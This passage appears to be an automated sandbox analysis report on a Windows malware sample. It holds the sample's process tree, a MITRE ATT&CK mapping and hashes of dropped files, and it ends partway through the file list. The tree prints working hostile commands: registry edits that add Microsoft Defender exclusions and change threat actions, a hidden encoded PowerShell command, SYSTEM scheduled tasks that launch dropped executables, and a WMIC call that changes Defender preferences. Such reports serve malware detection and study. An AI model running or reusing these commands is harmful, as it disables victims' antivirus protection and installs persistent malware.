C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFmSPwuuQ" /SC once /ST 01:13:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFmSPwuuQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFmSPwuuQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 02:32:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DslOhGm.exe\" XT /Tgsite_idGeK 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DslOhGm.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DslOhGm.exe XT /Tgsite_idGeK 385118 /S1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\wLcbel.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
6Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD58fe80eaf5594c4469f812fb924d22c62
SHA12af1912dbbca82df7e7c96167fa5e8f0aceb653e
SHA256c49936dcb8e293828936e8b6ac52c523465e5737741a556a21c1254613f23a35
SHA512d4d1184dfe5d571d02b34aa525f75bb397b2f74fd82ad025abbfe70aac4b44e1428c1ba9fddc1d30fadfeda4dd22cd9816115ee98151493db9a5b72ee22fbcfa
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
20KB
MD521873c79b5c3d97bd5acdc627c67ef5d
SHA1ec0077fcfc52b669f210cde5cad5bce6d9f3fc0b
SHA25614b5d382ca13d45d259219a27d2204909afafb08a323ef2a347868c53ecd500a
SHA512585125ed5e128961bdf31e82d43ffd89f4cb640e0af41932d3d344741057fb5d5bdec4c92f63315c4aa8c79658cee0f445c45e0aa585b1f45cccacc831afad52
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5bd2ebc0e4cf5c37fe9574eecd5ddd8a2
SHA1b65c71f2989bb9dccc8d5c70d34ee5fad96351f5
SHA25684f7307a123498a1523e16e5cb03f769b7240790bef087d7654a3b1b6ea956fe
SHA51255db64421066830c74ca5a490430e2bba1125abff21f48ee82faffb2c94b00a043ae9d699b4703aecaf45d32d381e247fe3bce4be968371f54f18557ef008d66
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5f60a27b83e4ba610da67230b4c77a79d
SHA1177dc9f5f57f48cd279f96a61ccd6feb05b181bd
SHA25662bcac2b96075946626e3a0cde4635b12f3380179a7cc33c2919f2f36ee2f789
SHA51215bb475f6bcc6ccf7983f7c48d0dc85dd612af37fb3871c6007b852fd7caa8bc47fcf370d8c65d195dec6f0b90a0f7a582766456666892961060d8aa48da37e4
-
C:\Users\Admin\AppData\Local\Temp\2e61539eFilesize
1.4MB
MD5731d6c6f4a4616cb0de9fa94f4399883
SHA1fc55c254411ca415e6d163ced4e1e29a8bdd80d3
SHA256d493c2f7d48d89cc346cfc764fd15b5dd59c53fe44436ff0133e0ccb21c40cb7
SHA5125fa6c1d0db5f1f867a8aa53c0d74ffaa979ef99484e26366c06eb1530f495be69cdc760155c21d1a0fa41adcce3e1dbe2936a4a2b0ee1a3124c2feae52205cdb
-
C:\Users\Admin\AppData\Local\Temp\7zS5B0C.tmp\Install.exeFilesize
6.8MB
MD5e77964e011d8880eae95422769249ca4
SHA18e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA5128feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zb0k1kw5.xlj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txtFilesize
2KB
MD527c4a448e388a4f0654b898b016d0832
SHA1cd0df17da2441e2434a56552429143496d338cfb
SHA256dc24d9854bdfb21b0998bc9430004570b5f7ddddca9a9ded1f123be813ac63be
SHA512de687f9c8356689489af5669fc963eb198429ee2b6bead313497817f79c4575130d392daceeaa637f7954fd7800d559278c048884a463555d72e1b7f406d3f29
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txtFilesize
3KB
MD5ed3c2b3c2418625575cf0c93d86061ea
SHA11585e5736b79ad3d98e91dc062fb800b1223bdd8
SHA25674068addb26e6dc4f0555cc27d5ec752520dd9dd3aa123666c14991d0578e87f
SHA5120f803e853cf1b681953ae16cd9e546ffc2bb13d800372866965aed312bec9fc4bdea5dc6c0f505c382a3ced2a763c3fee0a61d5ae8052de0a122d0325a4d1d35
-
C:\Users\Admin\AppData\Local\Temp\tmp3C4B.tmpFilesize
20KB
MD542c395b8db48b6ce3d34c301d1eba9d5
SHA1b7cfa3de344814bec105391663c0df4a74310996
SHA2565644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA5127b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
-
C:\Users\Admin\AppData\Local\Temp\tmp3C8C.tmpFilesize
20KB
MD522be08f683bcc01d7a9799bbd2c10041
SHA12efb6041cf3d6e67970135e592569c76fc4c41de
SHA256451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457
SHA5120eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936
-
C:\Users\Admin\AppData\Local\Temp\u384.0.exeFilesize
272KB
MD574b818f861dfd211e8db02620b407889
SHA15f4a7ddb0fe2397282eaf8d605163f649751af14
SHA2568a44beea88733d38861d837377fb270613ca1f5f9c6ce7658c6899f82910d3eb
SHA51272c79a7398617f1968e14ab01f2f218e976206d1fdcbb4dced7ccb2e93ae69982a95768106a79e2e055e5c547f01197480beaca626e4fbd1bfadb3056a4552bd
-
C:\Users\Admin\AppData\Local\Temp\u384.1.zipFilesize
3.7MB
MD578d3ca6355c93c72b494bb6a498bf639
SHA12fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA5121b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea
-
C:\Users\Admin\AppData\Local\Temp\u384.2\UIxMarketPlugin.dllFilesize
1.6MB
MD5d1ba9412e78bfc98074c5d724a1a87d6
SHA10572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA5128765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f
-
C:\Users\Admin\AppData\Local\Temp\u384.2\bunch.datFilesize
1.3MB
MD51e8237d3028ab52821d69099e0954f97
SHA130a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA2569387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3
-
C:\Users\Admin\AppData\Local\Temp\u384.2\relay.dllFilesize
1.5MB
MD510d51becd0bbce0fab147ff9658c565e
SHA14689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA2567b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA51229faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29
-
C:\Users\Admin\AppData\Local\Temp\u384.2\run.exeFilesize
2.4MB
MD59fb4770ced09aae3b437c1c6eb6d7334
SHA1fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256
-
C:\Users\Admin\AppData\Local\Temp\u384.2\whale.dbfFilesize
85KB
MD5a723bf46048e0bfb15b8d77d7a648c3e
SHA18952d3c34e9341e4425571e10f22b782695bb915
SHA256b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273
-
C:\Users\Admin\AppData\Local\Temp\u384.3.exeFilesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954
-
C:\Users\Admin\Pictures\AHnLC4HTPoTQBvfFYTDQGgzq.exeFilesize
412KB
MD5e664e8b15d8f58886c15f2a710c458ea
SHA1c15bdf45a9d58dcd5d0faac8e80cdcfc8fd8da27
SHA2562a4463508a9e92e02ab37666bde35053ab8a0f449abdb54efa436274522578a5
SHA512bd60c4e7c84f0bfa29036336a94491f18e3d458a606a3c4ea2e8d311ff4a0206f0b3854c1ec8a6724b74f799a9983583111cc8fe5c8247e89b9aaafcfc1ca13c
-
C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exeFilesize
4.2MB
MD513f0c4cfd4865359bd3654ed36216acd
SHA18030770ed024d64039d1830ce2b07d0683cae717
SHA256b01f9aaf90ef31df41173f98f12f23dcda37f0f1f713169f18df01db428de8d7
SHA51237c568429e89e5829f62f665b91d33b61c09b1bc1fbefe62437b29cbc38713d7d722fcd3d13bd7380baba84a40d11be3f906dfda0b57c0384395917250f53cf5
-
C:\Users\Admin\Pictures\SzKigIDAe1j2pUJtKhKBZnNC.exeFilesize
6.8MB
MD5d981fb3fc1f28bea729db051c75dae08
SHA1d5eea12045a6d998da1a362f70748fc09874d0b4
